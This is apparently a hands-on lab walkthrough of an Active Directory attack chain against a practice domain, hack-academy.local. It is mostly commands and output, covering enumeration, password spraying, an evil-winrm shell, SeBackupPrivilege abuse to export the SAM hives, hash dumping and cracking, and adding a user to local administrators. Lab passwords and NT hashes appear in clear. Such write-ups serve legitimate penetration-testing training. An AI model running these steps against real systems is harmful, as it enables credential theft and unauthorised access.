AD Chain 01 — Blueprint AD-Chains
nxc smb 10.0.2.0/24
AD Chain 01 — Blueprint AD-Chains
$nxc smb 10.0.2.0/24 $SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack-academy.local) (signing:True) (SMBv1:False) $SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:hack-academy.local) (signing:False) (SMBv1:False)$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)$Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00$Credentials: Initial credentials for AD Chain 1 lab: lbennett : !!reiD123Port Enumeration Client 1 - 10.0.2.7
$sudo rustscan -a 10.0.2.7 -- -A -sC$ $PORT STATE SERVICE REASON VERSION$135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC$139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn$445/tcp open microsoft-ds? syn-ack ttl 128$3389/tcp open ms-wbt-server syn-ack ttl 128 Microsoft Terminal Services$|_ssl-date: 2026-02-11T00:57:02+00:00; +2s from scanner time.$| ssl-cert: Subject: commonName=Client-1.hack-academy.local$| Issuer: commonName=Client-1.hack-academy.local$| Public Key type: rsa$| Public Key bits: 2048$| Signature Algorithm: sha256WithRSAEncryption$| Not valid before: 2026-02-10T03:16:18$| Not valid after: 2026-08-12T03:16:18$| MD5: 78ae:4ed7:3306:afef:cc38:6a51:4f99:0a15$| SHA-1: 0baf:8ccc:38a0:8371:b911:3a1f:b7bb:2598:52b2:a2b3$| rdp-ntlm-info: $| Target_Name: HACK-ACADEMY$| NetBIOS_Domain_Name: HACK-ACADEMY$| NetBIOS_Computer_Name: CLIENT-1$| DNS_Domain_Name: hack-academy.local$| DNS_Computer_Name: Client-1.hack-academy.local$| DNS_Tree_Name: hack-academy.local$| Product_Version: 10.0.19041$|_ System_Time: 2026-02-11T00:56:22+00:00$5040/tcp open unknown syn-ack ttl 128$5985/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)$|_http-server-header: Microsoft-HTTPAPI/2.0$|_http-title: Not Found$49671/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC$Host script results:$| smb2-time: $| date: 2026-02-11T00:56:22$|_ start_date: N/A$| nbstat: NetBIOS name: CLIENT-1, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:80:1d:57 (Oracle VirtualBox virtual NIC)$| Names:$| CLIENT-1<00> Flags: <unique><active>$| HACK-ACADEMY<00> Flags: <group><active>$| CLIENT-1<20> Flags: <unique><active>$| Statistics:$| 08:00:27:80:1d:57:00:00:00:00:00:00:00:00:00:00:00$| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00$|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00$|_clock-skew: mean: 1s, deviation: 0s, median: 1s$| smb2-security-mode: $| 3:1:1: $|_ Message signing enabled but not required$| p2p-conficker: $| Checking for Conficker.C or higher...$| Check 1 (port 54967/tcp): CLEAN (Timeout)$| Check 2 (port 10855/tcp): CLEAN (Timeout)$| Check 3 (port 49010/udp): CLEAN (Timeout)$| Check 4 (port 9711/udp): CLEAN (Timeout)$|_ 0/4 checks are positive: Host is CLEAN or ports are blocked$ $49671/tcp open msrpc Microsoft Windows RPCPort Enumeration Client 2 — 10.0.2.9
$sudo rustscan -a 10.0.2.9 -- -A -sC$ $PORT STATE SERVICE REASON VERSION$135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC$139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn$445/tcp open microsoft-ds? syn-ack ttl 128$3389/tcp open ms-wbt-server syn-ack ttl 128 Microsoft Terminal Services$|_ssl-date: 2026-02-11T01:06:23+00:00; +2s from scanner time.$| rdp-ntlm-info: $| Target_Name: HACK-ACADEMY$| NetBIOS_Domain_Name: HACK-ACADEMY$| NetBIOS_Computer_Name: CLIENT-2$| DNS_Domain_Name: hack-academy.local$| DNS_Computer_Name: Client-2.hack-academy.local$| DNS_Tree_Name: hack-academy.local$| Product_Version: 10.0.19041$|_ System_Time: 2026-02-11T01:05:43+00:00$| ssl-cert: Subject: commonName=Client-2.hack-academy.local$| Issuer: commonName=Client-2.hack-academy.local$| Public Key type: rsa$| Public Key bits: 2048$| Signature Algorithm: sha256WithRSAEncryption$| Not valid before: 2026-02-10T03:16:17$| Not valid after: 2026-08-12T03:16:17$| MD5: 37c5:b36f:0481:662d:8982:d0b7:edfc:cf3b$| SHA-1: e36f:a0a5:8ca6:9a7f:5ff8:ca66:a8a5:81de:aaed:80fd$5040/tcp open unknown syn-ack ttl 128$5985/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)$|_http-server-header: Microsoft-HTTPAPI/2.0$|_http-title: Not Found$49671/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPCPort Enumeration DC — 10.0.2.4
$sudo rustscan -a 10.0.2.4 -- -A -sC$ $PORT STATE SERVICE REASON VERSION$53/tcp open domain syn-ack ttl 128 Simple DNS Plus$88/tcp open kerberos-sec syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2026-02-11 03:43:53Z)$135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC$139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn$389/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: hack-academy.local, Site: Default-First-Site-Name)$445/tcp open microsoft-ds? syn-ack ttl 128$464/tcp open kpasswd5? syn-ack ttl 128$593/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0$636/tcp open tcpwrapped syn-ack ttl 128$3268/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: hack-academy.local, Site: Default-First-Site-Name)$5985/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)$|_http-title: Not Found$|_http-server-header: Microsoft-HTTPAPI/2.0$9389/tcp open mc-nmf syn-ack ttl 128 .NET Message Framing$49634/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0$49664/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC$49667/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC$49668/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC$53452/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC$53460/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPCEvilwinrm and RDP into Clinent 1 would not work
$evil-winrm -i 10.0.2.4 -u 'lbennett' -p '!!reiD123'$xfreerdp3 /v:10.0.2.4 /u:'lbennett' /p:'!!reiD123' /cert:ignore /dynamic-resolution /drive:linux,/opt/ +clipboardBloodHound
$#Get Bloodhound Data$netexec ldap 10.0.2.4 -u lbennett -p '!!reiD123' --bloodhound --collection All --dns-server 10.0.2.4$#Get all users$netexec ldap 10.0.2.4 -u lbennett -p '!!reiD123' --users $Administrator$Guest$krbtgt$mjohnson$lbennett$egreen$spatel$dreyes$nflores$clee$otran$zmiller$mross$twest$eknight$mthompson$#Its also very important to run it with --users only as set of credentials can be in the description$(kali㉿kali)-[~/AD-chain1]$└─$ netexec ldap 10.0.2.4 -u lbennett -p '!!reiD123' --users $LDAP 10.0.2.4 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hack-academy.local)$LDAP 10.0.2.4 389 DC01 [+] hack-academy.local\lbennett:!!reiD123 $LDAP 10.0.2.4 389 DC01 [*] Enumerated 16 domain users: hack-academy.local$LDAP 10.0.2.4 389 DC01 -Username- -Last PW Set- -BadPW- -Description- $LDAP 10.0.2.4 389 DC01 Administrator 2025-11-29 14:30:04 0 Built-in account for administering the computer/domain$LDAP 10.0.2.4 389 DC01 Guest <never> 1 Built-in account for guest access to the computer/domain$LDAP 10.0.2.4 389 DC01 krbtgt 2025-08-24 13:08:23 12 Key Distribution Center Service Account $LDAP 10.0.2.4 389 DC01 mjohnson 2025-11-24 01:40:43 12 $LDAP 10.0.2.4 389 DC01 lbennett 2025-11-24 01:40:43 1 $LDAP 10.0.2.4 389 DC01 egreen 2025-11-24 01:40:43 12 $LDAP 10.0.2.4 389 DC01 spatel 2025-11-24 01:40:43 12 $LDAP 10.0.2.4 389 DC01 dreyes 2025-11-24 01:40:43 12 $LDAP 10.0.2.4 389 DC01 nflores 2025-11-24 01:40:43 12 $LDAP 10.0.2.4 389 DC01 clee 2025-11-24 01:40:43 12 $LDAP 10.0.2.4 389 DC01 otran 2025-11-24 01:40:44 12 $LDAP 10.0.2.4 389 DC01 zmiller 2025-11-24 01:40:44 12 $LDAP 10.0.2.4 389 DC01 mross 2025-11-24 01:40:44 12 $LDAP 10.0.2.4 389 DC01 twest 2025-11-29 15:16:20 0 HappyCactus$10 $LDAP 10.0.2.4 389 DC01 eknight 2025-11-24 01:40:44 0 $LDAP 10.0.2.4 389 DC01 mthompson 2025-11-29 14:53:23 3 Spray with new credentials across the network and across all different protocols— First SMB
$(kali㉿kali)-[~/AD-chain1]$netexec smb ips -u users -p passwords --continue-on-success $SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack-academy.local) (signing:True) (SMBv1:False)$SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:hack-academy.local) (signing:False) (SMBv1:False) $SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\lbennett:!!reiD123 $SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\twest:HappyCactus$10 $SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\lbennett:!!reiD123 $SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\twest:HappyCactus$10 $SMB 10.0.2.4 445 DC01 [+] hack-academy.local\lbennett:!!reiD123 $SMB 10.0.2.4 445 DC01 [+] hack-academy.local\twest:HappyCactus$10 Spray with new credentials across the network and across all different protocols— Then Winrm
$kali㉿kali)-[~/AD-chain1]$└─$ netexec winrm ips -u users -p passwords --continue-on-success$WINRM 10.0.2.7 5985 CLIENT-1 [+] hack-academy.local\twest:HappyCactus$10 (Pwn3d!)$/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.$ arc4 = algorithms.ARC4(self._key) Spray with new credentials across the network and across all different protocols— Then RDP
$(kali㉿kali)-[~/AD-chain1]$└─$ netexec rdp ips -u users -p passwords --continue-on-success$RDP 10.0.2.7 3389 CLIENT-1 [*] Windows 10 or Windows Server 2016 Build 19041 (name:CLIENT-1) (domain:hack-academy.local) (nla:True)$RDP 10.0.2.9 3389 CLIENT-2 [*] Windows 10 or Windows Server 2016 Build 19041 (name:CLIENT-2) (domain:hack-academy.local) (nla:True)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\Administrator:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\Guest:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\krbtgt:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\mjohnson:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [+] hack-academy.local\lbennett:!!reiD123 $RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\egreen:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\spatel:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\dreyes:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\nflores:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\clee:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\otran:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\zmiller:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\mross:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\twest:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\eknight:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\mthompson:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\Administrator:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\Guest:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\krbtgt:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\mjohnson:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\lbennett:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\egreen:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\spatel:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\dreyes:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\nflores:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\clee:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\otran:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\zmiller:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\mross:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [+] hack-academy.local\twest:HappyCactus$10 $RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\eknight:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [-] hack-academy.local\mthompson:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\Administrator:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\Guest:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\krbtgt:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\mjohnson:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [+] hack-academy.local\lbennett:!!reiD123 $RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\egreen:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\spatel:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\dreyes:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\nflores:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\clee:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\otran:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\zmiller:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\mross:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\twest:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\eknight:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\mthompson:!!reiD123 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\Administrator:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\Guest:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\krbtgt:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\mjohnson:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\lbennett:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\egreen:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\spatel:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\dreyes:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\nflores:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\clee:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\otran:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\zmiller:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\mross:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [+] hack-academy.local\twest:HappyCactus$10 $RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\eknight:HappyCactus$10 (STATUS_LOGON_FAILURE)$RDP 10.0.2.9 3389 CLIENT-2 [-] hack-academy.local\mthompson:HappyCactus$10 (STATUS_LOGON_FAILURE)$Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00Found credentials in Descriptio n and it works on Client1 twest:HappyCactus$10 winrm
$#Check Bloodhound Data with those owned Users(screenshot omitted) (screenshot omitted) (screenshot omitted) (screenshot omitted) Nothing useful in Bloodhound so lets winrm into Client1
$evil-winrm -i 10.0.2.7 -u 'twest' -p 'HappyCactus$10'$ $Evil-WinRM shell v3.7$ $Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline$ $Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion$ $Info: Establishing connection to remote endpoint$*Evil-WinRM* PS C:\Users\twest\Documents> $#Check for the Folders and permissions$*Evil-WinRM* PS C:\Users\twest> tree /a /f$Folder PATH listing$Volume serial number is DAB7-CF4A$C:.$+---Desktop$+---Documents$+---Downloads$+---Favorites$+---Links$+---Music$+---Pictures$+---Saved Games$\---Videos$*Evil-WinRM* PS C:\Users\twest> whoami /all$ $USER INFORMATION$----------------$ $User Name SID$================== ==============================================$hack-academy\twest S-1-5-21-1516340173-3939677173-1136271741-1135$ $GROUP INFORMATION$-----------------$ $Group Name Type SID Attributes$==================================== ================ ============ ==================================================$Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group$BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group$BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group$BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group$NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group$NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group$NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group$NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group$Mandatory Label\High Mandatory Level Label S-1-16-12288$ $PRIVILEGES INFORMATION$----------------------$ $Privilege Name Description State$============================= ==================================== =======$SeBackupPrivilege Back up files and directories Enabled$SeRestorePrivilege Restore files and directories Enabled$SeShutdownPrivilege Shut down the system Enabled$SeChangeNotifyPrivilege Bypass traverse checking Enabled$SeUndockPrivilege Remove computer from docking station Enabled$SeIncreaseWorkingSetPrivilege Increase a process working set Enabled$SeTimeZonePrivilege Change the time zone Enabled$ $USER CLAIMS INFORMATION$-----------------------$ $User claims unknown.$ $Kerberos support for Dynamic Access Control on this device has been disabled.$*Evil-WinRM* PS C:\Users\twest> Privesc with abuse of SeBackupPrivilege
$*Evil-WinRM* PS C:\Users\twest> cd c:\$*Evil-WinRM* PS C:> mkdir temp$ $ Directory: C:\$ $Mode LastWriteTime Length Name$---- ------------- ------ ----$d----- 2/11/2026 8:08 PM temp$ $*Evil-WinRM* PS C:> cd temp$*Evil-WinRM* PS C:\temp> reg save hklm\sam c:\Temp\sam$The operation completed successfully.$ $*Evil-WinRM* PS C:\temp> dir$ $ Directory: C:\temp$ $Mode LastWriteTime Length Name$---- ------------- ------ ----$-a---- 2/11/2026 8:08 PM 49152 sam$ $*Evil-WinRM* PS C:\temp> reg save hklm\system c:\Temp\system$The operation completed successfully.$ $*Evil-WinRM* PS C:\temp> download sam$ $Info: Downloading C:\temp\sam to sam$ $Info: Download successful!$*Evil-WinRM* PS C:\temp> download systemAnd now we can dump hashes with secretsdump and we get the hashes
$└─$ impacket-secretsdump -system system -sam sam local$Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies $ $[*] Target system bootKey: 0xbacf965a2426afda3d2207e4d6aa3904$[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)$Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::$Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::$DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::$WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:156e3de3d13ba510e8c2b62f4f5d0216:::$Matt:1002:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::$[*] Cleaning up... Crack it with john and format=nt — We get password for Matt : Password1!
$john --wordlist=/usr/share/wordlists/rockyou.txt hashes_local_client1 --format=nt$Using default input encoding: UTF-8$Loaded 3 password hashes with no different salts (NT [MD4 128/128 SSE2 4x3])$Warning: no OpenMP support for this hash type, consider --fork=8$Press 'q' or Ctrl-C to abort, almost any other key for status$ (Administrator) $Password1! (Matt) $2g 0:00:00:00 DONE (2026-02-12 00:19) 2.222g/s 15937Kp/s 15937Kc/s 16137KC/s markinho..*7¡Vamos!$Warning: passwords printed above might not be all those cracked$Use the "--show --format=NT" options to display all of the cracked passwords reliablySince Matt is not domain user, you can just spraying but with —local-auth
$netexec winrm ips -u Matt -p 'Password1!' --local-auth$─(kali㉿kali)-[~/AD-chain1]$└─$ netexec winrm ips -u Matt -p 'Password1!' --local-auth$WINRM 10.0.2.7 5985 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 (name:CLIENT-1) (domain:hack-academy.local)$WINRM 10.0.2.4 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hack-academy.local)$WINRM 10.0.2.9 5985 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 (name:CLIENT-2) (domain:hack-academy.local)$/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.$ arc4 = algorithms.ARC4(self._key)$WINRM 10.0.2.7 5985 CLIENT-1 [-] CLIENT-1\Matt:Password1!$/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.$ arc4 = algorithms.ARC4(self._key)$WINRM 10.0.2.4 5985 DC01 [-] DC01\Matt:Password1!$/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.$ arc4 = algorithms.ARC4(self._key)$WINRM 10.0.2.9 5985 CLIENT-2 [-] CLIENT-2\Matt:Password1!$Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00$ $┌──(kali㉿kali)-[~/AD-chain1]$└─$ netexec smb ips -u Matt -p 'Password1!' --local-auth$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:DC01) (signing:True) (SMBv1:False) $SMB 10.0.2.4 445 DC01 [-] DC01\Matt:Password1! STATUS_LOGON_FAILURE $SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:CLIENT-2) (signing:False) (SMBv1:False)$SMB 10.0.2.9 445 CLIENT-2 [-] CLIENT-2\Matt:Password1! STATUS_LOGON_FAILURE $SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:CLIENT-1) (signing:False) (SMBv1:False)$SMB 10.0.2.7 445 CLIENT-1 [+] CLIENT-1\Matt:Password1! $Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00$ $┌──(kali㉿kali)-[~/AD-chain1]$└─$ netexec rdp ips -u Matt -p 'Password1!' --local-auth$RDP 10.0.2.9 3389 CLIENT-2 [*] Windows 10 or Windows Server 2016 Build 19041 (name:CLIENT-2) (domain:CLIENT-2) (nla:True)$RDP 10.0.2.9 3389 CLIENT-2 [-] CLIENT-2\Matt:Password1! (STATUS_LOGON_FAILURE)$RDP 10.0.2.7 3389 CLIENT-1 [*] Windows 10 or Windows Server 2016 Build 19041 (name:CLIENT-1) (domain:CLIENT-1) (nla:True)$RDP 10.0.2.7 3389 CLIENT-1 [+] CLIENT-1\Matt:Password1! (Pwn3d!)$Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00Matt can RDP into Client1
$xfreerdp3 /v:10.0.2.7 /u:'Matt' /p:'Password1!' /cert:ignore /dynamic-resolution /drive:linux,/opt/ +clipboard$#Since Matt is part of the Administrators Group, you can add twest into the same group as well and then dump$net localgroup "administrators" twest /add(screenshot omitted) Now you can Remotely dump all the Hashes —> You want to dump (sam, lsassy, nanodump,lsa and lsa secdump) hashes. Lsasy dumps mscash2 which is important for pivoting!
$─$ nxc smb 10.0.2.7 -u twest -p 'HappyCactus$10' --sam $SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:hack-academy.local) (signing:False) (SMBv1:False)$SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\twest:HappyCactus$10 (Pwn3d!)$SMB 10.0.2.7 445 CLIENT-1 [*] Dumping SAM hashes$SMB 10.0.2.7 445 CLIENT-1 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::$SMB 10.0.2.7 445 CLIENT-1 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::$SMB 10.0.2.7 445 CLIENT-1 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::$SMB 10.0.2.7 445 CLIENT-1 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:156e3de3d13ba510e8c2b62f4f5d0216:::$SMB 10.0.2.7 445 CLIENT-1 Matt:1002:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::$SMB 10.0.2.7 445 CLIENT-1 [+] Added 5 SAM hashes to the database$ 